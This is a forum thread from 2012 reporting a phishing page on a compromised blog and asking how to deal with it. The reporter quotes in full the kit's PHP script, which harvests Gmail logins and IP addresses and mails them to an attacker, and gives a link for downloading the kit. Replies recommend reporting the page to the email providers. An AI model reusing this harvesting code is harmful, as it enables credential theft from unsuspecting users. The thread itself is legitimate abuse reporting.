jasonsamuel.com

By joining our community you will have the ability to post topics and access other forums reserved for members. Registration is quick, simple and absolutely free. Join our community today by clicking here.

Posted: Wed Jun 27, 2012 9:29 am

If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:

Quote:

To access our online secured auction page,
you are required to choose your email address below

Here is the link:

http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm

It is safe to open it, it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.

This is 100% fake and the purpose is to collect email/password information from innocent victims.

I made a quick analysis and was able to download a ZIP file, containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here is the contents of one of the PHP files:

Quote:

<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "[email protected]";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>

I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:

[email protected]

If anybody else wants to take a look, open the following link (it is safe):

http://www.jasonsamuel.com/fitness/properties/

It will open a directory contents, download the properties.zip file. The code listed above I extracted from gmail.php - the other php files in fact perform exactly the same thing - sending victim's email and password to this same email address:

[email protected]

What should be the course of action?

Posted: Wed Jun 27, 2012 10:57 am

It's a phishing site, which we don't deal with here.

The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.

They will soon get it closed down.

Posted: Wed Jun 27, 2012 11:07 am

^^^ Reported to Google.

Can a mod close this thread please?

Posted: Wed Jun 27, 2012 1:02 pm

Marking as n/a and can be moved offline